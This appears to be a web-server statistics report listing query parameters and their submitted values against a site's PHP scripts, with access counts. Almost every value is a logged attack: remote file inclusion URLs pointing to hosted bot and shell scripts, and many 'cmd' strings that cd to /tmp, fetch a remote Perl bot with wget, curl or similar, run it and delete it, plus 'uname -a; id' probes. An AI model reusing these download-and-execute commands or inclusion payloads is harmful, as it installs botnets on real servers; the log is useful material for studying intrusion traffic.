cd /tmp;GET http://spr0x.kit.net/bot.txt > bot.txt;perl bot. txt;rm bot.txt	14
cd /tmp;GET http://johncarter.50webs.com/bot.txt > bot.txt;p erl bot.txt;rm bot.txt	13
cd /tmp;rm but.txt;wget http://eep.br/~gpereira/but.txt;fetc h http://eep.br/~gpereira/but.txt;lwp-download http://eep.br /~gpereira/but.txt;curl -O http://eep.br/~gpereira/but.txt;l ynx http://eep.br/~gpereira/but.txt;perl but.txt	11
Parameter	list
Value	Accesses
1	4
Parameter	mo/www.locations-cotedazur.com/index.php?lg
Value	Accesses
http://www.freewebs.com/h1h1h1/p.txt??	5
http://www.freewebs.com/t420/p.txt??	4
http://www.rj2009.kit.net/ddd.txt?	4
http://www.freewebs.com/playssonn/p.txt??	3
http://www.rj2008.kit.net/p.txt??	3
http://www.rj2009.kit.net/p.txt?	2
http://www.rj2009.kit.net/ddd.txt??	1
http://www.rj2009.kit.net/p.txt??	1
http://www.carpegamer.forbrazil.com.br/novo/back.txt??	1
http://www.chapolin-ownz.us/inbox.txt?	1
Parameter	mosConfig_absolute_
Value	Accesses
http://www.lordxpl.we.bs/own.txt????	4
http://joaobenner.googlepages.com/script2.txt??	3
http://www.lordxpl.xpg.com.br/own.txt????	2
Parameter	mosConfig_absolute_path
Value	Accesses
http://qlzr.host.sk/line.gif?	153
http://dark4ngel.hostinggratisargentina.com/http?	106
http://usuarios.arnet.com.ar/larry123/safe.txt?	105
http://spr0x.kit.net/cmdpriv8/tool25.dat?	92
http://www.jungo8949.co.kr/tool25.txt?	74
http://ownsirc.googlepages.com/botnet.txt?	57
	50
http://www.freewebs.com/yahwek/phpbot.txt?	48
http://www.oslutadores.com/?id=23530	46
http://www.autogas-dortmund.de/index.txt?	45
Parameter	mosConfig_absolute_pathhttp://www.r57.li/c99.txt?
Value	Accesses
	2
Parameter	mosconfig_absolute_path
Value	Accesses
	30
http://agatsuma.bestfreewebspace.net/bn	2
Parameter	s
Value	Accesses
r	2
Parameter	xroot
Value	Accesses
www.popcorn.de/cmd?	1
OTHER:	5,733
Script	Total Accesses
/wusage/weekly//	5,719
Parameters by Submitted Value
Parameter	CONFIG_EXT[LANGUAGES_DIR]
Value	Accesses
http://incesp.com/id1.txt?	2
http://kb27.co.kr/bbs///id1.txt??	1
http://withkor.net/snapshot/id1.txt??	1
Parameter	CONFIG_EXT[LIB_DIR]
Value	Accesses
http://www.hotelmoulin.com/db/icon/aa.txt?	3
http://www.johngarzon.com.co/list/heheh.txt????	2
Parameter	DIR_PREFIX
Value	Accesses
http://www.the-real.com/steelbahamas/id1.txt??	2
Parameter	DOCUMENT_ROOT
Value	Accesses
http://www.seeum.co.kr/zero/zipcode/crespon1.txt?	6
http://comhelp.spb.ru//idxx.txt???	6
http://www.foodntop.com/bbs/data/notice_1/robot.txt????	3
http://www.seeum.co.kr/zero/data/idxx.txt??	2
http://www.lazar.ru/manager/processors/min.txt?	2
http://www.allforweb.co.kr/data/lang/fatal1.txt??	2
http://www.kq-china.com/web//plugins/system/id1.txt???	2
http://www.someday-store.com/shop/images/uploads/.../.../1.t xt??	1
http://www.allforweb.co.kr/data/lang/fatal1.txt?	1
http://cemerlangclean.com/byz9991.txt??	1
Parameter	GLOBALS
Value	Accesses
	154
Parameter	INCLUDE_FOLDER
Value	Accesses
http://www.howtolisten.kr/lct/exam3/81/auto1.txt?	10
http://surihouse.co.kr/bbs/skin/sakk_k/fx29id1.txt?	4
http://www.fileden.com/files/2009/11/5/2637636/id1.txt??	4
http://www.luvyadating.com/temp/cache/userimages/id/id1.txt? ?	4
http://www.tosiltosil.net/zero//skin/z_music_let_b/images/ve r1?	3
http://zonadeclientes.com/id1.txt??	2
http://nic.bupt.edu.cn/media/j1.txt??	2
http://musicadelibreria.net/footer?	2
http://listwm.info//fx29id.txt?	2
http://www.clubmodellismocimavilla.com/web/htdocs/data/1.txt ??	2
Parameter	Inc[temp_root]
Value	Accesses
http://creative-alchemy.com/zencart//media/id1.txt???	1
Parameter	Itemid
Value	Accesses
	2
Parameter	REX[INCLUDE_PATH]
Value	Accesses
http://www.foodntop.com/bbs/icon/LC1??	4
http://www.foodntop.com/bbs/data/notice_1/robot.txt????	3
http://kumcalb.org///g4/adm/img/thumb/id1.txt?	2
http://www.fileden.com/files/2010/1/5/2714272/id1.txt?	1
Parameter	SERVER[DOCUMENT_ROOT]
Value	Accesses
http://phoviet.vn.net//backend/id1.txt???	2
OTHER:	5,478
Script	Total Accesses
/wusage/summary/cgi.html//components/com_facileforms/facilef orms.frame.php	5,709
Parameters by Submitted Value
Parameter
Value	Accesses
	1
Parameter	cmd
Value	Accesses
cd /tmp;rm bnt.txt;wget http://garyz.110mb.com/bnt.txt;fetch http://garyz.110mb.com/bnt.txt;lwp-download http://garyz.11 0mb.com/bnt.txt;curl -O http://garyz.110mb.com/bnt.txt;lynx http://garyz.110mb.com/bnt.txt;perl bnt.txt	30
cd /tmp;GET http://johncarter.50webs.com/bot.txt > bot.txt;p erl bot.txt;rm bot.txt	24
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	22
cd /tmp;GET http://www.army5.com.br/bot.txt > bot.txt;perl b ot.txt;rm bot.txt	22
cd /tmp;GET http://johncarter.50webs.com/bruxOm4l.txt > brux Om4l.txt;perl bruxOm4l.txt abcase	20
cd /tmp;rm bn.txt;wget http://garyz.110mb.com/bn.txt;fetch h ttp://garyz.110mb.com/bn.txt;lwp-download http://garyz.110mb .com/bn.txt;curl -O http://garyz.110mb.com/bn.txt;lynx http: //garyz.110mb.com/bn.txt;perl bn.txt	17
cd /tmp;rm root.txt;wget www.3sk3nt.kit.net/root.txt;fetch w ww.3sk3nt.kit.net/root.txt;lwp-download www.3sk3nt.kit.net/r oot.txt;curl -O www.3sk3nt.kit.net/root.txt;lynx www.3sk3nt. kit.net/root.txt;perl root.txt	16
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net /bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http:// www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt	15
cd /tmp;GET http://spr0x.kit.net/bot.txt > bot.txt;perl bot. txt;rm bot.txt	14
cd /tmp;rm scan.txt;wget http://garyz.110mb.com/scan.txt;fet ch http://garyz.110mb.com/scan.txt;lwp-download http://garyz .110mb.com/scan.txt;curl -O http://garyz.110mb.com/scan.txt; lynx http://garyz.110mb.com/scan.txt;perl scan.txt;rm -rf sc an.txt	14
Parameter	ff_colendar/samplecalendar.php/oneadmin/adminfoot.php?path[d ocroot]
Value	Accesses
http://www.rj2008.kit.net/p.txt??	6
http://www.freewebs.com/h1h1h1/p.txt??	6
http://www.rj2009.kit.net/ddd.txt?	5
http://www.freewebs.com/t420/p.txt??	5
http://www.freewebs.com/playssonn/p.txt??	4
http://www.digownz.kit.net/pbot1.txt??	4
http://www.freewebs.com/b0mb4do1337/p.txt??	4
http://flaw.we.bs/a.txt?	2
http://www.rj2009.kit.net/p.txt?	2
http://www.digownz.kit.net/scanperl.txt?	1
Parameter	ff_compath
Value	Accesses
http://spr0x.kit.net/cmdpriv8/tool25.dat?	121
http://ownsirc.googlepages.com/botnet.txt?	83
http://www.lordxpl.xpg.com.br/own.txt?	69
http://www.freewebs.com/yahwek/phpbot.txt?	68
http://www.lordxpl.xpg.com.br/own.txt??	66
http://www.oslutadores.com/?id=23530	58
http://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat?	53
http://www.freewebs.com/yahwek/sete.txt?	51
http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/ima ges/.asc/www?????????????????????????????	50
	49
Parameter	ff_compathhttp://www.gvnr.xpg.com.br/Hotmail.txt?
Value	Accesses
	1
Parameter	list
Value	Accesses
1	18
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.ritterspektakel-leipzig.de/administrator/can?	1
OTHER:	4,787
Script	Total Accesses
/wusage/summary/cgi.html//include.php	5,014
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net /bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http:// www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt	25
uname -a; id	11
cd /tmp;rm bnt.txt;wget http://garyz.110mb.com/bnt.txt;fetch http://garyz.110mb.com/bnt.txt;lwp-download http://garyz.11 0mb.com/bnt.txt;curl -O http://garyz.110mb.com/bnt.txt;lynx http://garyz.110mb.com/bnt.txt;perl bnt.txt	10
id	10
cd /tmp;rm srz.txt;wget http://www.freewebs.com/bl4bl4bl4bl4 /srz.txt;fetch http://www.freewebs.com/bl4bl4bl4bl4/srz.txt; lwp-download http://www.freewebs.com/bl4bl4bl4bl4/srz.txt;cu rl -O http://www.freewebs.com/bl4bl4bl4bl4/srz.txt;lynx http ://www.freewebs.com/bl4bl4bl4bl4/srz.txt;perl srz.txt;rm -rf srz.txt*	8
cd /tmp;rm start.txt;wget http://71.41.190.203/start.txt;fet ch http://71.41.190.203/start.txt;lwp-download http://71.41. 190.203/start.txt;curl -O http://71.41.190.203/start.txt;lyn x http://71.41.190.203/start.txt;perl start.txt;rm -rf start .txt*	8
cd /tmp;rm bn.txt;wget http://www.ownedson.110mb.com/bn.txt; fetch http://www.ownedson.110mb.com/bn.txt;lwp-download http ://www.ownedson.110mb.com/bn.txt;curl -O http://www.ownedson .110mb.com/bn.txt;lynx http://www.ownedson.110mb.com/bn.txt; perl bn.txt	6
cd /tmp;wget http://projectyenor2.iespana.es/file234.txt;cur l -O http://projectyenor2.iespana.es/file234.txt;fetch http: //projectyenor2.iespana.es/file234.txt;lynx http://projectye nor2.iespana.es/file234.txt;lwp-download http://projectyenor 2.iespana.es/file234.txt;perl file234.txt??	6
cd /tmp;killall perl -9;rm -rf *.txt;GET http://murilok.pop3 .ru/RFI3.txt > RFI3.txt;perl RFI3.txt;rm RFI3.txt	6
cd /tmp;rm -rf box.txt;wget http://eep.br/~gpereira/box.txt; fetch http://eep.br/~gpereira/box.txt;lwp-download http://ee p.br/~gpereira/box.txt;curl -O http://eep.br/~gpereira/box.t xt;lynx http://eep.br/~gpereira/box.txt;perl box.txt;rm -rf *.txt	5
Parameter	list
Value	Accesses
1	28
Parameter	path[docroot]
Value	Accesses
http://ownsirc.googlepages.com/botnet.txt?	85
http://www.rele.by/files/id.txt?	66
http://www.oslutadores.com/?id=23530	62
http://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat?	58
http://www.freewebs.com/yahwek/sete.txt?	56
http://www.freewebs.com/yahwek/phpbot.txt?	55
http://www.jolieloves.com/mori/cmd.txt?	53
http://189.23.251.131/~tiago/new.txt?	52
	44
http://www.lordxpl.xpg.com.br/own.txt??	39
OTHER:	4,321
Script	Total Accesses
/wusage/summary/cgi.html//modules/xfsection/modify.php	4,696
Parameters by Submitted Value
Parameter	caminho
Value	Accesses
marajoara	1
Parameter	cmd
Value	Accesses
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net /bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http:// www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt	24
cd /tmp;lwp-download http://h1.ripway.com/tsk4/botx2.txt;per l botx2.txt;rm -rf txt	22
uname -a; id	17
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	14
cd /tmp;lwp-download http://h1.ripway.com/cmdtsk/botx2.txt;p erl botx2.txt;rm -rf txt	13
cd /tmp;wget http://h1.ripway.com/tsk4/botx2.txt;perl botx2. txt;rm -rf txt	10
cd /tmp;lwp-download http://h1.ripway.com/arroba5/botx.txt;p erl botx.txt;rm -rf botx	8
cd /tmp;wget http://h1.ripway.com/cmdtsk/botx2.txt;perl botx 2.txt;rm -rf txt	7
cd /tmp;rm -rf box.txt;wget http://eep.br/~gpereira/box.txt; fetch http://eep.br/~gpereira/box.txt;lwp-download http://ee p.br/~gpereira/box.txt;curl -O http://eep.br/~gpereira/box.t xt;lynx http://eep.br/~gpereira/box.txt;perl box.txt;rm -rf *.txt	7
id	7
Parameter	dir_module
Value	Accesses
http://ownsirc.googlepages.com/botnet.txt?	85
http://www.oslutadores.com/?id=23530	62
http://www.jolieloves.com/mori/cmd.txt?	56
http://www.freewebs.com/yahwek/sete.txt?	52
http://189.23.251.131/~tiago/new.txt?	51
http://h1.ripway.com/tsk4/cmd.txt?	50
http://www.freewebs.com/yahwek/phpbot.txt?	50
	47
http://www.diabinhoinfernal.kit.net/iLeGaiS/tool25.txt?	36
http://lol123.fileave.com/script9.txt??	34
Parameter	list
Value	Accesses
1	26
OTHER:	4,017
Script	Total Accesses
///	4,474
Parameters by Submitted Value
Parameter	APB_rp
Value	Accesses
http://jvo.dk/fuursaml/TNG//gedcom_folder/babid.txt???	3
Parameter	CONFIG[path]
Value	Accesses
http://gumansin.com/pds/1.txt??	3
Parameter	DIR_PREFIX
Value	Accesses
http://www.town-classifieds.com/adpics/baner.txt???	3
http://www.lazar.ru/manager/processors/copyright.txt? ??	1
http://boeuftrad.free.fr//yacs/scripts/staging/files/idv6.tx t? ??	1
http://boeuftrad.free.fr//yacs/scripts/staging/files/id1.txt ? ?	1
Parameter	DOCUMENT_ROOT
Value	Accesses
http://dk.fileave.com/heheh.txt????	9
http://190.81.28.182/incaware/id1.txt??	4
http://www.corretoresdeseguros.com.br/estatisticas/id1???	3
http://www.hondooo.de//components/com_extcalendar/lib/data/i d.txt??	2
http://www.bernardyni.ofm.pl/bernardyni/cgi-bin/das/canales3 .txt??	1
http://gumansin.com/id.txt??	1
Parameter	FORM[session_id]
Value	Accesses
1	3
Parameter	FORM[set]
Value	Accesses
1	3
Parameter	GALLERY_BASEDIR
Value	Accesses
http://www.readingastro.org.uk/images/photos/about/id.txt??	3
Parameter	GLOBALS
Value	Accesses
	20
Parameter	INCLUDE_FOLDER
Value	Accesses
http://surya1.fileave.com/id.txt??	1
http://nic.bupt.edu.cn/media/j1.txt??	1
http://www.c21vox.tv/id1.txt??	1
http://www.jjdd.co.kr/nalog/plug_in_config/pro//id1???	1
Parameter	INCLUDE_PATH
Value	Accesses
http://musicadelibreria.net/footer??	1
OTHER:	4,408
Script	Total Accesses
/wusage/weekly/	3,634
Parameters by Submitted Value
Parameter	///////administrator/components/com_remository/admin.remosit ory.php?mosConfig_absolute_path
Value	Accesses
http://sites.google.com/site/nurhayatisatu/1.txt???	4
http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CI MG1122.jpg???	3
http://phamsight.com/docs/images/head??	1
Parameter	//kboard/kboard.php?board
Value	Accesses
notice	2
Parameter	/zb_path
Value	Accesses
http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt??	1
Parameter	APB_rp
Value	Accesses
http://www.bellasbar.co.za//templates_c/5.gif??	13
http://www.camoplast.com/pdf/1.gif?	6
http://www.baab.it/roxa/id1.txt???	4
http://www.lan51.fr/Portail/tp-images/a.gif??	4
http://www.artvariety.co.za/scan/zfxid1.txt??	2
http://www.kerfootgroup.co.uk/kf_pics/id1.txt????	2
http://roxd.altervista.org/id1.txt???	1
http://roxxxx.altervista.org/id1.txt???	1
Parameter	BESIDER
Value	Accesses
http://elitewa.go.ro/copyright.txt??	1
Parameter	CFG[libdir]
Value	Accesses
http://aboutav.com//o/id1.txt???	2
Parameter	CONFIG_EXT[ADMIN_PATH]
Value	Accesses
http://www.assa.co.kr/taijin76/bbs//skin/ggambo7002_board/co py/id1.txt??	2
Parameter	CONFIG_EXT[LANGUAGES_DIR]
Value	Accesses
http://163.16.46.253/appserv/www/fx29id1.txt??	6
http://www.phoxlab.com.br//xmlrpc/fx29id.txt????	4
Parameter	CONFIG_EXT[LIB_DIR]
Value	Accesses
http://www.howtolisten.kr/lct/exam3/81/auto1.txt???	2
http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt??	1
Parameter	DOCUMENT_ROOT
Value	Accesses
http://www.enyzone.cz/components/com_poll/z1??	10
http://setennis.com/zb41pl8/bbs/id1.txt?	4
http://pdcmanagement.com///idfx1.gif???	3
http://www.mama-nsk.ru/fx29id.txt?	3
http://users4.nofeehost.com/anjrit/fx/id1.txt??	3
http://www.steannareptile.it//administrator/id1.txt??	3
http://saskatchewan.localjobshop.ca/media/id1??	3
http://evgs-hohwald.de/pear/fx29id.txt??	2
http://jeffbickford.com/widgets/z1??	2
http://www.pmibangalorechapter.org/pmpc2009/x?	2
OTHER:	3,537
Script	Total Accesses
/wusage/summary/cgi.html/components/com_phpshop/toolbar.phps hop.html.php	3,465
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	21
id	14
cd /tmp;rm start.txt;wget http://189.24.138.40/start.txt;fet ch http://189.24.138.40/start.txt;lwp-download http://189.24 .138.40/start.txt;curl -O http://189.24.138.40/start.txt;lyn x http://189.24.138.40/start.txt;perl start.txt;rm start.txt	13
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net /bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http:// www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt	11
cd /tmp;rm bnt.txt;wget http://garyz.110mb.com/bnt.txt;fetch http://garyz.110mb.com/bnt.txt;lwp-download http://garyz.11 0mb.com/bnt.txt;curl -O http://garyz.110mb.com/bnt.txt;lynx http://garyz.110mb.com/bnt.txt;perl bnt.txt	10
cd /tmp;rm sta.txt;wget http://189.24.221.165:9090/sta.txt;f etch http://189.24.221.165:9090/sta.txt;lwp-download http:// 189.24.221.165:9090/sta.txt;curl -O http://189.24.221.165:90 90/sta.txt;lynx http://189.24.221.165:9090/sta.txt;perl sta. txt;rm sta.txt	9
cd /tmp;rm -rf box.txt;wget http://eep.br/~gpereira/box.txt; fetch http://eep.br/~gpereira/box.txt;lwp-download http://ee p.br/~gpereira/box.txt;curl -O http://eep.br/~gpereira/box.t xt;lynx http://eep.br/~gpereira/box.txt;perl box.txt;rm -rf *.txt	8
cd /tmp;wget http://206.71.148.32/anaozao.txt;curl -O -f htt p://206.71.148.32/anaozao.txt;lynx -source http://206.71.148 .32/anaozao.txt;lwp-rget http://206.71.148.32/anaozao.txt;fe tch http://206.71.148.32/anaozao.txt;perl anaozao.txt;rm -rf anaozao.txt	8
cd /tmp;rm pemlk.txt;wget http://members.lycos.co.uk/enviesc raps/pemlk.txt;fetch http://members.lycos.co.uk/enviescraps/ pemlk.txt;lwp-download http://members.lycos.co.uk/enviescrap s/pemlk.txt;curl -O http://members.lycos.co.uk/enviescraps/p emlk.txt;lynx http://members.lycos.co.uk/enviescraps/pemlk.t xt;perl pemlk.txt;rm -rf pemlk*.txt	7
cd /tmp;rm pemlk.txt;wget http://pemlk.iespana.es/tools/peml k.txt;fetch http://pemlk.iespana.es/tools/pemlk.txt;lwp-down load http://pemlk.iespana.es/tools/pemlk.txt;curl -O http:// pemlk.iespana.es/tools/pemlk.txt;lynx http://pemlk.iespana.e s/tools/pemlk.txt;perl pemlk.txt;rm pemlk.txt?	7
Parameter	list
Value	Accesses
1	13
Parameter	mosConfig_absolute_path
Value	Accesses
http://ownsirc.googlepages.com/botnet.txt?	59
http://www.jolieloves.com/mori/cmd.txt?	47
http://www.jungo8949.co.kr/tool25.txt?	42
http://www.oslutadores.com/?id=23530	36
http://www.freewebs.com/yahwek/sete.txt?	31
http://www.freewebs.com/yahwek/phpbot.txt?	30
http://www.neoncomanda.kit.net/tool25.dat?	30
	28
http://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat?	26
http://usuarios.arnet.com.ar/adrikrasnow/speed.txt?	26
OTHER:	2,989
Script	Total Accesses
/wusage/summary/cgi.html/modules/AllMyGuests/signin.php	3,452
Parameters by Submitted Value
Parameter	_AMGconfig[cfg_serverpath]
Value	Accesses
http://c4sh1234.100free.com/sc.gif?	52
http://ownsirc.googlepages.com/botnet.txt?	47
http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/ima ges/.asc/www?????????????????????????????	39
http://www.freewebs.com/yahwek/sete.txt?	35
http://www.oslutadores.com/?id=23530	34
http://www.jungo8949.co.kr/tool25.txt?	34
http://h1.ripway.com/tsk4/cmd.txt?	32
http://www.bergenfest.no/vnc/cmd.txt?	32
http://www.freewebs.com/yahwek/phpbot.txt?	25
http://usuarios.arnet.com.ar/adrikrasnow/speed.txt?	24
Parameter	_AMGconfig[cfg_serverpats/tinycontent/admin/spaw/spaw_contro l.class.php?spaw_root
Value	Accesses
http://www.digownz.kit.net/pbot1.txt??	9
http://www.freewebs.com/t420/p.txt??	6
http://www.freewebs.com/h1h1h1/p.txt??	6
http://www.rj2008.kit.net/p.txt??	6
http://www.rj2009.kit.net/ddd.txt?	6
http://www.freewebs.com/playssonn/p.txt??	5
http://www.freewebs.com/b0mb4do1337/p.txt??	4
http://www.digownz.kit.net/pbot1.txt?	4
http://flaw.we.bs/a.txt?	3
http://www.freewebs.com/playssonn/dq.txt?	2
Parameter	_AMGconfigcfg_serverpath]
Value	Accesses
http://h1.ripway.com/tsk4/cmd.txt?	31
http://h1.ripway.com/tsk7/cmd.txt?	11
http://h1.ripway.com/tsk4/botlogin.txt?	6
http://www.019online.com/components/com_rwcards/images/cmd.t xt?	5
http://h1.ripway.com/tsk4/TESTE.txt?	4
http://www.auzr.kz/tender/files/cmd.jpg?	3
http://h1.ripway.com/tsk7/botINDO.txt?	3
http://www.auzr.kz/tender/files/cmd.txt?	3
http://www.miskolctapolca.hu/hirdetesek/IND.jpg?	3
http://h1.ripway.com/tsk7/botIND.txt?	2
Parameter	caminho
Value	Accesses
marajoara	1
Parameter	chdir
Value	Accesses
	1
Parameter	cmd
Value	Accesses
cd /tmp;lwp-download http://h1.ripway.com/tsk4/botx2.txt;per l botx2.txt;rm -rf txt	27
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net /bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http:// www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt	17
cd /tmp;wget http://h1.ripway.com/tsk4/botx2.txt;perl botx2. txt;rm -rf txt	15
cd /tmp;lwp-download http://h1.ripway.com/cmdtsk/botx2.txt;p erl botx2.txt;rm -rf txt	14
uname -a; id	12
cd /tmp;killall perl -9;rm -rf *.txt;GET http://lolzao.pop3. ru/scanz.txt > scanz.txt;perl scanz.txt;rm scanz.txt	11
cd /tmp;lwp-download http://www.019online.com/components/com _rwcards/images/IND2.jpg;curl -O http://www.019online.com/co mponents/com_rwcards/images/IND2.jpg;wget http://www.019onli ne.com/components/com_rwcards/images/IND2.jpg;perl IND2.jpg; rm -rf IND	11
cd /tmp;lwp-download http://h1.ripway.com/tsk7/botx2.txt;per l botx2.txt;rm -rf txt	9
cd /tmp;curl -O http://h1.ripway.com/tsk7/botx2.txt;perl bot x2.txt;rm -rf txt	8
cd /tmp;wget http://h1.ripway.com/cmdtsk/botx2.txt;perl botx 2.txt;rm -rf txt	8
Parameter	list
Value	Accesses
1	19
OTHER:	2,823
Script	Total Accesses
/wusage/summary/cgi.html//index.php	3,235
Parameters by Submitted Value
Parameter	GLOBALS
Value	Accesses
	36
http://tanbebek.com/pitik/ascid.txt???	1
Parameter	Itemid50
Value	Accesses
	3
Parameter	Itemid
Value	Accesses
	350
26	4
1	2
191//administrator/configuration.php?option=com_login	2
156	2
87	1
149	1
87//index.php?option=com_joomlaxplorer	1
Parameter	_REQUEST
Value	Accesses
	37
Parameter	_REQUEST[Itemid
Value	Accesses
1	2
Parameter	_REQUEST[Itemid]
Value	Accesses
1	35
Parameter	_REQUEST[option]
Value	Accesses
com_content	19
com_phpshop	7
com_rsgallery	4
com_login	3
com_facileforms	2
com_performs	1
com_extcalendar	1
http://sujianto.com/zreg.txt?	1
Parameter	action
Value	Accesses
show_error	11
Parameter	admin_path
Value	Accesses
http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt?	3
Parameter	autoLoadConfig[999][0][autoType]
Value	Accesses
include	43
http://normanzito.iespana.es/http.txt??	6
http://cornuletz.angelfire.com/c99in.txt?	5
http://www.corsemusique.com/portail/agenda/config/tester.txt ?	3
http://www.corsemusique.com/portail/agenda/muie.txt?	3
http://freewebs.com/diegoxfelix/ch.txt?	2
http://mykonos.bargaingreece.com//components/com_log/sefe.tx t?	2
http://freewebs.com/larry123/bot.txt??	1
http://www.freewebs.com/diegoxfelix/ch.txt??	1
includehttp://pc2you.ro/classes/phpmailer/config/exp667.txt?	1
OTHER:	2,639
Script	Total Accesses
/wusage/summary/cgi.html/index.php	3,170
Parameters by Submitted Value
Parameter
Value	Accesses
connection:absolute_path=http://invisionar.hostinggratisarge ntina.com/eth0?	15
connection:absolute_path=http://www.santiagoonline.com.ar/ht tp?	9
connection:absolute_path=http://www.santiagoonline.com.ar/re adme.txt?	6
connection:absolute_path=http://usuarios.arnet.com.ar/adrikr asnow/test.txt?	4
connection:absolute_path=http://www.santiagoonline.com.ar/re adme.txt?http://www.santiagoonline.com.ar/readme.txt?	3
connection:absolute_path=http://tckct.co.uk/public_htm/speed .txt?	3
connection:absolute_path=http://arsenicotrolo.webcindario.co m/eth0?	2
connection:absolute_path=http://usuarios.arnet.com.ar/larry1 23/safe.txt?	2
http://aguasanas.com/dysloke/bot.txt?	2
connection:absolute_path=http://geragay.bravehost.com/http?	2
Parameter	GLOBALS
Value	Accesses
	140
Parameter	HomeDir
Value	Accesses
http://darkisx.com/plugins/xoops/2fast.txt?	1
Parameter	Itemid
Value	Accesses
	253
1	17
156	4
http://luminaldemon.altervista.org/img/cmd.txt???????????	1
Parameter	RP_PATH
Value	Accesses
http://www.wisdomofgod.org/backup/m2f/.r/vampire.txt?	1
http://eventtoday.com/bbs/skin/gallery_thum/safe.txt?	1
http://c0cac0larul3z.t35.com/cmd.txt?	1
http://www.spindl-hotelpraha.cz/system/temp/control.txt?	1
http://www.mascht.com/picart/mh.txt??	1
http://www.wisdomofgod.org/backup/m2f/.r/vampire.txt???	1
Parameter	_REQUEST
Value	Accesses
	147
http://usuarios.arnet.com.ar/adrikrasnow/speed.txt?	20
http://normanzito.iespana.es/http.txt??	18
http://usuarios.arnet.com.ar/adipasqua/http?	15
http://usuarios.arnet.com.ar/larry123/ka.txt?	15
http://usuarios.arnet.com.ar/larry123/exploit.txt?	14
http://usuarios.arnet.com.ar/larry123/http?	13
http://dark4ngel.hostinggratisargentina.com/http?	12
http://www.apocalypticduck.com/skins/advanced/config/exp667. txt?	9
http://fxmsn.org/1.txt?	9
Parameter	_REQUEST[Itemid
Value	Accesses
1	4
Parameter	_REQUEST[Itemid]
Value	Accesses
1	136
http://www.colorglo.it/oneadmin/calendar/.r/stringa.txt?	1
Parameter	_REQUEST[option]
Value	Accesses
com_content	70
com_phpshop	32
com_login	9
com_akobook	7
com_rsgallery	5
option,com_extcalendar	4
com_com_akobook	3
com_sitemap	3
com_phshop	2
com_facileforms	2
Parameter	absolute_path
Value	Accesses
http://www.skd.it/vwar/admin/can?	1
OTHER:	2,149
Script	Total Accesses
/wusage/summary/cgi.html/newspublish/include.php	3,026
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
uname -a; id	16
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net /bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http:// www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt	10
cd /tmp;rm pemlk.txt;wget http://pemlk.iespana.es/tools/peml k.txt;fetch http://pemlk.iespana.es/tools/pemlk.txt;lwp-down load http://pemlk.iespana.es/tools/pemlk.txt;curl -O http:// pemlk.iespana.es/tools/pemlk.txt;lynx http://pemlk.iespana.e s/tools/pemlk.txt;perl pemlk.txt;rm pemlk.txt?	6
id	6
cd /tmp;rm sta.txt;wget http://189.24.20.53/sta.txt;fetch ht tp://189.24.20.53/sta.txt;lwp-download http://189.24.20.53/s ta.txt;curl -O http://189.24.20.53/sta.txt;lynx http://189.2 4.20.53/sta.txt;perl sta.txt;rm sta.txt	6
cd /tmp;rm ng;wget http://ownz-you.com/ng.txt;fetch http:// ownz-you.com/ng.txt;lwp-download http://ownz-you.com/ng.txt; curl -O http://ownz-you.com/ng.txt;lynx http://ownz-you.com/ ng.txt;perl ng.txt;rm -rf ng	6
cd /tmp;rm -rf *;cd /tmp;lwp-download http://www1.freewebs.c om/sur00tec/srz.txt;fetch http://www1.freewebs.com/sur00tec/ srz.txt;curl -o http://www1.freewebs.com/sur00tec/srz.txt;wg et http://www1.freewebs.com/sur00tec/srz.txt;perl srz.txt;rm srz.txt	5
